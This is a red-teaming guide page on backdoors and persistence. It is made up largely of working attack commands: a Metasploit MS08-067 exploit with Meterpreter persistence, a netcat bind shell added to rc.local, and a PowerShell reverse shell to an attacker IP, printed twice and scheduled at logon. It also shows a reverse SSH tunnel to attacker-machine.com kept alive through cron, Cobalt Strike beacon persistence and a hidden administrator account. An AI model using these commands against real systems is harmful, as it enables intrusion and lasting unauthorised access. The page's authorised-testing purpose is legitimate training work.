Backdoors

Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit

Steps:

Exploit a vulnerability to gain an initial foothold.
Migrate to a stable process to maintain the session.
Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat

Steps:

Transfer Netcat to the target system.
Set up a persistent listener on the target system.

Example:

nc -lvp 4444 -e /bin/bash

To make it persistent, add the command to a startup script:

echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local

Using PowerShell for Windows Persistence

Tool: PowerShell

Steps:

Create a PowerShell script to establish a reverse shell.
Use Task Scheduler to run the script at startup.

Example:

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()}
$client.Close()

Save this script and schedule it using Task Scheduler:

schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

Creating a Reverse SSH Tunnel

Tool: SSH

Steps:

Set up a reverse SSH tunnel to maintain access.

Example:

ssh -R 9090:localhost:22 user@attacker-machine.com

To make it persistent, add the command to cron:

(crontab -l ; echo "@reboot ssh -R 9090:localhost:22 user@attacker-machine.com") | crontab -

Deploying Custom Backdoor with C2 Framework

Tool: Cobalt Strike

Steps:

Use Cobalt Strike to create a custom beacon.
Deploy the beacon on the target system and set it to call back periodically.

Example:

./teamserver <external IP> <password>
./agscript
> spawnb 192.168.1.100

In Cobalt Strike:

beacon> run persistence -script windows/beacon.exe -args 192.168.1.101 4444

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

net user hiddenadmin P@ssw0rd /add
net localgroup administrators hiddenadmin /add

Impact: The hidden user account provides the attacker with administrative access.

Some useful Backdoor references:

Understanding and effectively implementing persistence and backdoor techniques are critical for simulating advanced attack scenarios in red teaming engagements. While common backdoors are increasingly detected by EDRs, some methods can still circumvent these defenses by using advanced Red Teaming techniques that we cover in our live Red Teaming workshops.

PreviousAttacking MSSQL NextPivoting & Tunneling

Last updated 10 months ago

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte, 0, $sendbyte.Length) $stream.Flush()} $client.Close()